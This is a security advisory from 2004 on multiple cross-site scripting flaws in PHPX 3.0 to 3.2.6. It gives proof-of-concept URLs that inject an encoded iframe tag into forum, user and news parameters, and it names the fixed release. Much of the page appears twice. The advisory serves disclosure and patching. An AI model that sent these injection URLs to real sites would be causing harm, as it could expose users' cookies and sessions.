PHPX Multiple Cross-Site Scripting Vulnerabilities
BID:10283
Info
PHPX Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 10283 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 05 2004 12:00AM |
| Updated: | May 05 2004 12:00AM |
| Credit: | Disclosure of these issues is credited to JeiAr <[email protected]>. |
| Vulnerable: |
PHPX PHPX 3.2.6 PHPX PHPX 3.2.5 PHPX PHPX 3.2.4 PHPX PHPX 3.2.3 PHPX PHPX 3.2.2 PHPX PHPX 3.2.1 PHPX PHPX 3.2 .0 PHPX PHPX 3.1.4 PHPX PHPX 3.1.3 PHPX PHPX 3.1.2 PHPX PHPX 3.1.1 PHPX PHPX 3.1 .0 PHPX PHPX 3.0.7 PHPX PHPX 3.0.6 PHPX PHPX 3.0.5 PHPX PHPX 3.0.4 PHPX PHPX 3.0.3 PHPX PHPX 3.0.2 PHPX PHPX 3.0.1 PHPX PHPX 3.0 |
| Not Vulnerable: |
PHPX PHPX 3.3.1 PHPX PHPX 3.3 .0 |
Discussion
PHPX Multiple Cross-Site Scripting Vulnerabilities
It has been reported that PHPX is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input.
These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks.
It has been reported that PHPX is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input.
These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks.
Exploit / POC
PHPX Multiple Cross-Site Scripting Vulnerabilities
No exploit is required to leverage these issues. The following proof of concepts have been provided:
http://www.example.com/forums.php?forum_id=[VID]&limit=25%3Ciframe%3E
http://www.example.com/forums.php?forum_id=[VID]&topic_id=[VID]&limit=15%3Ciframe%3E
http://www.example.com/users.php?action=&limit=100%3Ciframe%3E
http://www.example.com/users.php?action=view&user_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?action=post&forum_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?action=search&search_id=[VID]&limit=25%3E%3Ciframe%3E
http://www.example.com/users.php?action=email&user_id=%3E%3Ciframe%3E
http://www.example.com/users.php?action=view&user_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?forum_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?forum_id=[VID]&topic_id=[VID]&limit=%3E%3Ciframe%3E
http://www.example.com/forums.php?action=post&forum_id=[VID]&topic_id=[VID]%3E%3Ciframe%3E
http://www.example.com/news.php?news_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?forum_id=[VID]&topic_id=[VID]%3E%3Ciframe%3E
No exploit is required to leverage these issues. The following proof of concepts have been provided:
http://www.example.com/forums.php?forum_id=[VID]&limit=25%3Ciframe%3E
http://www.example.com/forums.php?forum_id=[VID]&topic_id=[VID]&limit=15%3Ciframe%3E
http://www.example.com/users.php?action=&limit=100%3Ciframe%3E
http://www.example.com/users.php?action=view&user_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?action=post&forum_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?action=search&search_id=[VID]&limit=25%3E%3Ciframe%3E
http://www.example.com/users.php?action=email&user_id=%3E%3Ciframe%3E
http://www.example.com/users.php?action=view&user_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?forum_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?forum_id=[VID]&topic_id=[VID]&limit=%3E%3Ciframe%3E
http://www.example.com/forums.php?action=post&forum_id=[VID]&topic_id=[VID]%3E%3Ciframe%3E
http://www.example.com/news.php?news_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?forum_id=[VID]&topic_id=[VID]%3E%3Ciframe%3E
Solution / Fix
PHPX Multiple Cross-Site Scripting Vulnerabilities
Solution:
The vendor has released an upgrade that deals with these and other issues.
PHPX PHPX 3.0
PHPX PHPX 3.0.1
PHPX PHPX 3.0.2
PHPX PHPX 3.0.3
PHPX PHPX 3.0.4
PHPX PHPX 3.0.5
PHPX PHPX 3.0.6
PHPX PHPX 3.0.7
PHPX PHPX 3.1 .0
PHPX PHPX 3.1.1
PHPX PHPX 3.1.2
PHPX PHPX 3.1.3
PHPX PHPX 3.1.4
PHPX PHPX 3.2 .0
PHPX PHPX 3.2.1
PHPX PHPX 3.2.2
PHPX PHPX 3.2.3
PHPX PHPX 3.2.4
PHPX PHPX 3.2.5
PHPX PHPX 3.2.6
Solution:
The vendor has released an upgrade that deals with these and other issues.
PHPX PHPX 3.0
-
PHPX phpx-3.3.1.tar.gz
https://sourceforge.net/project/showfiles.php?group_id=67670&package_i d=65973&release_id=235919
PHPX PHPX 3.0.1
-
PHPX phpx-3.3.1.tar.gz
https://sourceforge.net/project/showfiles.php?group_id=67670&package_i d=65973&release_id=235919
PHPX PHPX 3.0.2
-
PHPX phpx-3.3.1.tar.gz
https://sourceforge.net/project/showfiles.php?group_id=67670&package_i d=65973&release_id=235919
PHPX PHPX 3.0.3
-
PHPX phpx-3.3.1.tar.gz
https://sourceforge.net/project/showfiles.php?group_id=67670&package_i d=65973&release_id=235919
PHPX PHPX 3.0.4
-
PHPX phpx-3.3.1.tar.gz
https://sourceforge.net/project/showfiles.php?group_id=67670&package_i d=65973&release_id=235919
PHPX PHPX 3.0.5
-
PHPX phpx-3.3.1.tar.gz
https://sourceforge.net/project/showfiles.php?group_id=67670&package_i d=65973&release_id=235919
PHPX PHPX 3.0.6
-
PHPX phpx-3.3.1.tar.gz
https://sourceforge.net/project/showfiles.php?group_id=67670&package_i d=65973&release_id=235919
PHPX PHPX 3.0.7
-
PHPX phpx-3.3.1.tar.gz
https://sourceforge.net/project/showfiles.php?group_id=67670&package_i d=65973&release_id=235919
PHPX PHPX 3.1 .0
-
PHPX phpx-3.3.1.tar.gz
https://sourceforge.net/project/showfiles.php?group_id=67670&package_i d=65973&release_id=235919
PHPX PHPX 3.1.1
-
PHPX phpx-3.3.1.tar.gz
https://sourceforge.net/project/showfiles.php?group_id=67670&package_i d=65973&release_id=235919
PHPX PHPX 3.1.2
-
PHPX phpx-3.3.1.tar.gz
https://sourceforge.net/project/showfiles.php?group_id=67670&package_i d=65973&release_id=235919
PHPX PHPX 3.1.3
-
PHPX phpx-3.3.1.tar.gz
https://sourceforge.net/project/showfiles.php?group_id=67670&package_i d=65973&release_id=235919
PHPX PHPX 3.1.4
-
PHPX phpx-3.3.1.tar.gz
https://sourceforge.net/project/showfiles.php?group_id=67670&package_i d=65973&release_id=235919
PHPX PHPX 3.2 .0
-
PHPX phpx-3.3.1.tar.gz
https://sourceforge.net/project/showfiles.php?group_id=67670&package_i d=65973&release_id=235919
PHPX PHPX 3.2.1
-
PHPX phpx-3.3.1.tar.gz
https://sourceforge.net/project/showfiles.php?group_id=67670&package_i d=65973&release_id=235919
PHPX PHPX 3.2.2
-
PHPX phpx-3.3.1.tar.gz
https://sourceforge.net/project/showfiles.php?group_id=67670&package_i d=65973&release_id=235919
PHPX PHPX 3.2.3
-
PHPX phpx-3.3.1.tar.gz
https://sourceforge.net/project/showfiles.php?group_id=67670&package_i d=65973&release_id=235919
PHPX PHPX 3.2.4
-
PHPX phpx-3.3.1.tar.gz
https://sourceforge.net/project/showfiles.php?group_id=67670&package_i d=65973&release_id=235919
PHPX PHPX 3.2.5
-
PHPX phpx-3.3.1.tar.gz
https://sourceforge.net/project/showfiles.php?group_id=67670&package_i d=65973&release_id=235919
PHPX PHPX 3.2.6
References
PHPX Multiple Cross-Site Scripting Vulnerabilities
References:
References:
- PHPX Homepage (PHPX)
- Vulnerabilities In PHPX 3.26 And Earlier (JeiAr
)